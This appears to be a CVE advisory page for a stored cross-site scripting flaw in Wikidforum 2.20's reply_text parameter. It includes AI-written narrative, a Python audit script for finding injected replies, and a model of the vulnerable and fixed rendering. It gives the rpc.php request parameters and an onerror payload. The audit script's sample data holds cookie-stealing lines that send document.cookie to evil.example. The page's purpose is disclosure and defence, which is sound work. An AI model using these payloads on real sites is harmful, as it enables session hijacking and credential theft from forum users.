CVE-2018-25384
Description
Wikidforum 2.20 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted HTML in the reply_text parameter. Attackers can post comments containing JavaScript code through the rpc.php endpoint that executes in other users' browsers when viewing forum replies.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Wikidforum 2.20 is vulnerable to stored cross-site scripting (XSS) via the reply_text parameter, allowing authenticated attackers to inject malicious JavaScript.
Vulnerability
Wikidforum version 2.20 contains a stored cross-site scripting (XSS) vulnerability in the reply_text parameter [2][4]. The application fails to properly sanitize user-supplied input when submitting forum replies via the rpc.php endpoint. An attacker can post crafted HTML containing JavaScript code, which is then stored and displayed to other users viewing the reply. The vulnerability affects Wikidforum version 2.20 (the latest at the time of disclosure) [3].
Exploitation
An attacker must be authenticated to the Wikidforum application [1][3]. Registration is open to anyone, so this prerequisite is trivial to meet. Exploitation consists of a crafted POST request to rpc.php with action=applications/post/rpc.php and mode=submit_reply, with the payload carried in the reply_text parameter (for example `<img src=x onerror=alert(1)>`, the payload quoted in the attack-vector section below) [3]. The request must carry a valid session cookie and Referer header so that it is indistinguishable from a legitimate reply submission. The injected script executes in the browser of any user who subsequently views the thread containing the malicious reply [4].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of other authenticated users' browsers [4]. This can lead to session hijacking, credential theft, defacement of forum content, or redirection to malicious sites. Whether the session cookie itself can be read depends on its HttpOnly flag; even with the flag set, script running in the victim's origin can send requests that carry the victim's session (for example posting further replies or changing account settings). The impact is limited to what the victim's browser session can do and does not directly grant server-side control [4].
Mitigation
As of the cited references, no patched release addresses this vulnerability [3][4]; version 2.20 is the latest available. The fix belongs in the application: HTML-encode reply_text at output time, wherever it is rendered into a page, and optionally reject or strip raw markup on input if the forum does not intend to allow it. Operators who cannot modify the code can reduce exposure by sending a Content Security Policy that disallows inline script, setting HttpOnly on the session cookie, closing open registration, and auditing already-stored replies for injected markup, since an existing malicious reply keeps firing until it is removed.
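The audit of stored replies mentioned in the last point, as an added example written for this page rather than code from Wikidforum: it walks a set of exported reply rows (a constructed sample; the (id, text) row shape is an assumption about the export, not Wikidforum's schema) with the standard-library HTML parser and flags replies that carry script-bearing tags, on* event-handler attributes, or javascript: URLs, the set the advisory's payload falls into.

```python
"""Triage helper for operators of an unpatched Wikidforum 2.20 install:
find replies already stored with browser-interpretable markup.

Added example for this page. The row format and sample data below are
constructed for illustration and are not Wikidforum's schema or real forum
content.
"""
from html.parser import HTMLParser

# Tags that can run script or pull in remote code when rendered unencoded.
RISKY_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
              "link", "meta", "base"}
# Attributes whose value is a URL, where a javascript: scheme runs script.
URL_ATTRS = {"href", "src", "action", "formaction", "data", "xlink:href"}


class MarkupAudit(HTMLParser):
    """Collects a finding for each risky tag, on* handler or javascript: URL."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names and decodes
        # character references inside attribute values, so an obfuscated
        # javascript&#58; still arrives here as "javascript:".
        if tag in RISKY_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif (name in URL_ATTRS and value
                  and value.strip().lower().startswith("javascript:")):
                self.findings.append(f"{tag}@{name}=javascript:")

    # Self-closing syntax (<img ... />) must be inspected the same way.
    handle_startendtag = handle_starttag


def audit_reply(text):
    """Return the list of findings for one stored reply_text value."""
    parser = MarkupAudit()
    parser.feed(text)
    parser.close()
    return parser.findings


def audit_rows(rows):
    """rows: iterable of (reply_id, reply_text). Returns {reply_id: findings}
    containing only the replies that produced at least one finding."""
    hits = {}
    for reply_id, text in rows:
        findings = audit_reply(text)
        if findings:
            hits[reply_id] = findings
    return hits


# Constructed sample rows, not real forum data. Row 102 is the advisory's
# payload; 104 shows that a bare "<" in ordinary prose is not a tag.
SAMPLE_ROWS = [
    (101, "Thanks, that fixed it for me."),
    (102, "<img src=x onerror=alert(1)>"),
    (103, "see <a href=\"javascript:fetch('//evil.example/?c='+document.cookie)\">here</a>"),
    (104, "use a < b && b > c in the condition"),
    (105, "<script>new Image().src='//evil.example/?'+document.cookie</script>"),
]

if __name__ == "__main__":
    for reply_id, findings in audit_rows(SAMPLE_ROWS).items():
        print(reply_id, findings)
```

Benign formatting tags such as `<b>` are deliberately not reported, so a forum that permits limited markup does not drown in noise; the parser's decoding of entities in attribute values means that encoding tricks inside `href` or `on*` values are still caught, but text that only becomes markup after a second decoding pass is out of scope here.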
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: =2.20
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing output sanitization of the reply_text parameter allows stored cross-site scripting."
Attack vector
An authenticated attacker submits a crafted POST request to `rpc.php` with the `action=applications/post/rpc.php&mode=submit_reply` parameters. The `reply_text` parameter contains an HTML payload such as `<img src=x onerror=alert(1)>`. When other users view the forum thread, the injected script executes in their browsers. The attacker must be logged in, but registration is open to anyone [1].
Affected code
The vulnerability is in the `rpc.php` endpoint, specifically the `reply_text` POST parameter. The application fails to sanitize or escape HTML/JavaScript content submitted through this parameter before rendering it in forum replies.
What the fix does
The advisory does not include a patch. The necessary fix is to HTML-encode `reply_text` wherever it is rendered into a page (in PHP, `htmlspecialchars` with `ENT_QUOTES`, or the template engine's escaping function). Input-side filtering can complement this but is not a substitute: encoding at output is what stops the browser from interpreting stored markup. Without it, any HTML or JavaScript submitted through the parameter is interpreted by the browser, enabling stored cross-site scripting.
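The request the Exploitation and Attack vector sections describe, and the output-encoding fix described above, as an added example written for this page. Only `rpc.php`, the three parameter names and the payload come from the advisory; the handler, the reply store and the two render functions are stand-ins, not Wikidforum's code. Python's `html.escape` plays the role that `htmlspecialchars($reply_text, ENT_QUOTES, 'UTF-8')` would play in the PHP source.

```python
"""Model of the reply flow behind CVE-2018-25384.

Added example for this page. The handler, template and storage are
stand-ins written for illustration; only the endpoint rpc.php, the
parameters action/mode/reply_text and the payload are from the advisory.
"""
from html import escape
from urllib.parse import parse_qs, urlencode

# Payload quoted in the advisory's attack-vector section.
PAYLOAD = '<img src=x onerror=alert(1)>'

# Stand-in for the forum's reply table.
REPLIES = []


def build_reply_body(reply_text):
    """Form body of the crafted POST to rpc.php: the three parameters the
    advisory names. The session cookie and Referer header travel as HTTP
    headers, not in the body, so they are outside this model."""
    return urlencode({
        "action": "applications/post/rpc.php",
        "mode": "submit_reply",
        "reply_text": reply_text,
    })


def submit_reply(body):
    """Server side (stand-in): accept the reply when mode matches and store
    reply_text exactly as received, which is what 2.20 does."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("mode") != ["submit_reply"]:
        return False
    REPLIES.append(params.get("reply_text", [""])[0])
    return True


def render_vulnerable(reply):
    """The defect the advisory describes: the stored text is concatenated
    into the page with no output encoding, so the <img> tag and its onerror
    handler reach the viewer's browser intact."""
    return f'<div class="reply">{reply}</div>'


def render_fixed(reply):
    """Output encoding at render time. escape(..., quote=True) turns &, <, >,
    " and ' into entities, so the browser displays the payload as text
    instead of executing it. The stored value is left untouched."""
    return f'<div class="reply">{escape(reply, quote=True)}</div>'


def demo():
    """Run the attacker's submission through both renderers."""
    REPLIES.clear()
    accepted = submit_reply(build_reply_body(PAYLOAD))
    assert accepted
    stored = REPLIES[0]
    return render_vulnerable(stored), render_fixed(stored)


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable:", vulnerable)
    print("fixed:     ", fixed)
```

Encoding at output rather than rewriting the stored text means replies already in the database are neutralised the moment the template changes, which matters here because no upstream patch exists and the injected content may already be present.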
Preconditions
- Authentication: attacker must be an authenticated user (registration is open to anyone)
- Input: attacker submits a POST request to rpc.php with a crafted reply_text parameter
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.